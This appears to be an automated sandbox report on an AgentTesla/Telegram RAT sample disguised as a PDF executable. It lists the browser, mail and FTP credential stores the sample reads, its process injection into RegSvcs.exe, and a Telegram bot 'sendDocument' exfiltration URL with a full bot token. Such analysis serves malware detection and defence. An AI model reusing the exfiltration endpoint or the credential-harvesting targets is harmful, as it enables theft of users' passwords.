                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara matchFile source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3edcc90.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3e74280.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3e74280.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3edcc90.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection312Masquerading11OS Credential Dumping2Security Software Discovery211Remote ServicesEmail Collection1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Credentials in Registry1Virtualization/Sandbox Evasion131SMB/Windows Admin SharesArchive Collected Data11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection312NTDSApplication Window Discovery1Distributed Component Object ModelData from Local System2Scheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information12Cached Domain CredentialsSystem Information Discovery114VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing23DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      20220114080343434.pdf.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.0.RegSvcs.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      8.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.RegSvcs.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.RegSvcs.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.RegSvcs.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://www.urwpp.dedc0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cnP0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htmSw0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.founder.c0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kra-e0%URL Reputationsafe
                      http://www.carterandcone.com0%URL Reputationsafe
                      http://UeFrqT.com0%Avira URL Cloudsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      https://api.telegram.org40%URL Reputationsafe
                      http://www.carterandcone.comue0%URL Reputationsafe
                      http://www.typography.net0%URL Reputationsafe
                      http://crl.veris0%Avira URL Cloudsafe
                      http://www.carterandcone.com90%URL Reputationsafe
                      http://www.fontbureau.comB.TTF0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/denHp0%Avira URL Cloudsafe
                      http://www.sajatypeworks.comW0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cne&0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                      http://www.carterandcone.comuy0%Avira URL Cloudsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sajatypeworks.coma0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      https://xXcVm5kmD6Gyza.org(0%Avira URL Cloudsafe
                      http://www.fonts.comiv0%Avira URL Cloudsafe
                      http://www.urwpp.de0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.carterandcone.como.0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://www.typography.net(0%Avira URL Cloudsafe
                      http://www.tiro.com5v0%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.sajatypeworks.coms0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://www.founder.com.cn/cnTC0%URL Reputationsafe
                      https://xXcVm5kmD6Gyza.org0%Avira URL Cloudsafe
                      http://www.fontbureau.coma0%URL Reputationsafe
                      http://en.w0%URL Reputationsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.founder.com.cn/cn/0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn90%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.carterandcone.comn-u/0%Avira URL Cloudsafe
                      http://www.sandoll.co.krr-t0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/staff/dennis.htmNp0%Avira URL Cloudsafe
                      http://www.carterandcone.comesS0%Avira URL Cloudsafe
                      http://www.typography.netiv0%Avira URL Cloudsafe
                      http://www.urwpp.dem0%Avira URL Cloudsafe
                      http://fontfabrik.com(0%Avira URL Cloudsafe
                      http://www.sandoll.co.kru-hX0%Avira URL Cloudsafe
                      http://www.tiro.comic0%URL Reputationsafe
                      http://www.micro.0%Avira URL Cloudsafe
                      http://www.urwpp.dec0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocumentfalse
                          high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.fontbureau.com/designersG20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                            high
                            http://www.urwpp.dedc20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.founder.com.cn/cnP20220114080343434.pdf.exe, 00000000.00000003.286148512.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286315824.0000000005CFA000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286054163.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285976448.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285870318.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286200312.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/?20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bThe20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.orgRegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpfalse
                                high
                                http://www.fontbureau.com/designers?20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/frere-jones.html.$20220114080343434.pdf.exe, 00000000.00000003.291515061.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291556929.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291697526.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291435256.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291598283.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291358079.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291398360.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291473881.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291757927.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291647210.0000000005CEF000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.galapagosdesign.com/staff/dennis.htmSw20220114080343434.pdf.exe, 00000000.00000003.294959412.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295114414.0000000005CEB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tiro.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers20220114080343434.pdf.exe, 00000000.00000003.290845442.0000000005CF2000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.founder.c20220114080343434.pdf.exe, 00000000.00000003.285870318.0000000005CEB000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.goodfont.co.kr20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sandoll.co.kra-e20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.com20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://UeFrqT.comRegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designersR20220114080343434.pdf.exe, 00000000.00000003.291078110.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290998503.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291023701.0000000005CEF000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sajatypeworks.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283710366.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283067842.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282926493.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282954072.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283094856.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283849906.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283794895.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283036793.0000000005CF3000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.netD20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cn/cThe20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htm20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://fontfabrik.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283914641.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283885811.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283942441.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283961213.0000000005CEB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.telegram.org4RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.carterandcone.comue20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.net20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://crl.verisRegSvcs.exe, 00000008.00000002.558576320.00000000065C8000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.carterandcone.com920220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.comB.TTF20220114080343434.pdf.exe, 00000000.00000002.311680143.0000000001397000.00000004.00000040.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocumentdocument-----RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.galapagosdesign.com/staff/denHp20220114080343434.pdf.exe, 00000000.00000003.295330398.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295411677.0000000005CEB000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sajatypeworks.comW20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283067842.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283094856.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283036793.0000000005CF3000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPlease20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.zhongyicts.com.cne&20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://api.ipify.org%GETMozilla/5.0RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          low
                                          http://www.ascendercorp.com/typedesigners.html20220114080343434.pdf.exe, 00000000.00000003.289190210.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289318058.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289093184.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289252588.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289143103.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288858385.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288918153.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288983388.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289034401.0000000005CF3000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comuy20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fonts.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283710366.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.kr20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpfalse
                                              high
                                              http://www.sajatypeworks.coma20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.urwpp.deDPlease20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://xXcVm5kmD6Gyza.org(RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://www.fonts.comiv20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.urwpp.de20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.292550293.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cn20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286803625.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.carterandcone.como.20220114080343434.pdf.exe, 00000000.00000003.286962308.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sakkal.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288918153.0000000005CF3000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
